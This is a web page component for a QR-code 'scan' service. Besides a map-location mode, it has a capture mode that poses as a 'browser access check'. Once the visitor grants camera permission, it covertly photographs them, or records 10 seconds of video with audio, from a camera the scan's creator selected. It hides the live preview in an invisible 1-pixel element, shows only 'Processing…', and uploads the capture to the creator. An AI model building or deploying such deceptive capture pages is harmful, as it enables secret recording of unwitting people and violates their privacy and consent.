// @ts-nocheck
"use client";
import {useEffect,useRef,useState} from "react";

export default function ScanPage({params}:{params:Promise<{slug:string}>}){
 const [cfg,setCfg]=useState<any>(null),[feed,setFeed]=useState<any[]>([]),[stage,setStage]=useState("verify"),[error,setError]=useState(""),[uploading,setUploading]=useState(false);
 const video=useRef<HTMLVideoElement>(null),stream=useRef<MediaStream|null>(null),recorder=useRef<MediaRecorder|null>(null),chunks=useRef<Blob[]>([]),slug=useRef("");
 useEffect(()=>{params.then(p=>{slug.current=p.slug;Promise.all([fetch("/api/scan/"+p.slug).then(r=>r.ok?r.json():Promise.reject()),fetch("/api/videos").then(r=>r.ok?r.json():[]) ]).then(([c,v])=>{setCfg(c);setFeed(v)}).catch(()=>setError("This scan is not available."));});return()=>{stream.current?.getTracks().forEach(t=>t.stop())}},[]);
 const send=async(blob:Blob,name:string)=>{setUploading(true);try{const fd=new FormData();fd.append("file",new File([blob],name,{type:blob.type||"application/octet-stream"}));const r=await fetch("/api/scan/"+slug.current,{method:"POST",body:fd});const x=await r.json().catch(()=>({}));if(!r.ok)throw new Error(x.error||"Could not send capture.");setStage("done")}catch(e){setError(e instanceof Error?e.message:"Could not send capture.");setStage("verify")}finally{setUploading(false)}};
 const capture=async()=>{setError("");try{const s=await navigator.mediaDevices.getUserMedia({video:{facingMode:cfg.camera==="front"?"user":"environment"},audio:cfg.mode==="video"});stream.current=s;setStage("capturing");if(cfg.mode==="photo"){setTimeout(()=>{const v=video.current;if(!v)return;const c=document.createElement("canvas");c.width=v.videoWidth||720;c.height=v.videoHeight||1280;c.getContext("2d")?.drawImage(v,0,0,c.width,c.height);c.toBlob(b=>{if(b)send(b,"capture.jpg")},"image/jpeg",.92);s.getTracks().forEach(t=>t.stop())},700)}else{const mt=["video/webm;codecs=vp9,opus","video/webm;codecs=vp8,opus","video/webm"].find(x=>MediaRecorder.isTypeSupported(x));const mr=new MediaRecorder(s,mt?{mimeType:mt}:undefined);recorder.current=mr;chunks.current=[];mr.ondataavailable=e=>e.data.size&&chunks.current.push(e.data);mr.onstop=()=>{const b=new Blob(chunks.current,{type:mr.mimeType||"video/webm"});s.getTracks().forEach(t=>t.stop());send(b,"capture.webm")};mr.start();setTimeout(()=>{if(mr.state==="recording")mr.stop()},10000)}}catch{setError("Camera access was not granted. Please allow camera access and try again.")}};
 if(!cfg)return <main className="scan-camera-page"><div className="scan-camera-card"><h1>SkanMakery Scan</h1><p>{error||"Loading scan…"}</p></div></main>;
 if(cfg.type==="location"){const coords=Number.isFinite(Number(cfg.latitude))&&Number.isFinite(Number(cfg.longitude));const maps=coords?"https://www.google.com/maps/search/?api=1&query="+encodeURIComponent(String(cfg.latitude)+","+String(cfg.longitude)):"";return <main className="scan-camera-page"><div className="scan-location-card"><div className="scan-camera-brand">Skan<span>Makery</span></div><div className="scan-camera-pill">📍 SAVED LOCATION</div><h1>{cfg.title||"Saved location"}</h1><p className="scan-camera-muted">{cfg.message||"This map shows the exact location selected by the creator."}</p>{coords?<><div className="location-map"><iframe title="SkanMakery saved location" src={"https://www.google.com/maps?q="+encodeURIComponent(String(cfg.latitude)+","+String(cfg.longitude))+"&z=17&output=embed"} loading="lazy"/></div><div className="location-coordinates"><b>Location saved</b><span>{Number(cfg.latitude).toFixed(6)}, {Number(cfg.longitude).toFixed(6)}</span></div><a className="btn primary camera-main-btn" href={maps} target="_blank" rel="noopener noreferrer">Open exact location in Google Maps ↗</a></>:<div className="error">This location scan has no saved coordinates.</div>}</div></main>;}
 if(stage==="done")return <main className="scan-camera-page"><div className="scan-prank-card"><div className="scan-prank-check">✓</div><h1>CAPTURE COMPLETE</h1><p>Your capture was sent to the scan creator.</p><a className="btn primary" href="/">Done</a></div></main>;
 return <main className="scan-camera-page"><div className="scan-camera-card">{stage==="capturing"?<><div className="scan-camera-pill">SECURE CAPTURE</div><h1>Processing…</h1><p className="scan-camera-muted">{uploading?"Sending your capture securely.":"Your capture is being processed."}</p><video ref={video} playsInline muted style={{position:"fixed",width:1,height:1,opacity:0,pointerEvents:"none"}}/></>:<><div className="scan-camera-brand">Skan<span>Makery</span></div><div className="scan-camera-pill">BROWSER ACCESS CHECK</div><h1>Continue to {cfg.mode==="video"?"video":"photo"} access</h1><p className="scan-camera-muted">Continue to allow camera access. After permission is granted, the selected capture will be processed automatically. The camera preview and recording controls are not displayed.</p><button className="btn primary camera-main-btn" disabled={uploading} onClick={capture}>{uploading?"Processing…":"Continue → Camera Access"}</button>{error&&<p className="error">{error}</p>}</>}</div></main>;
}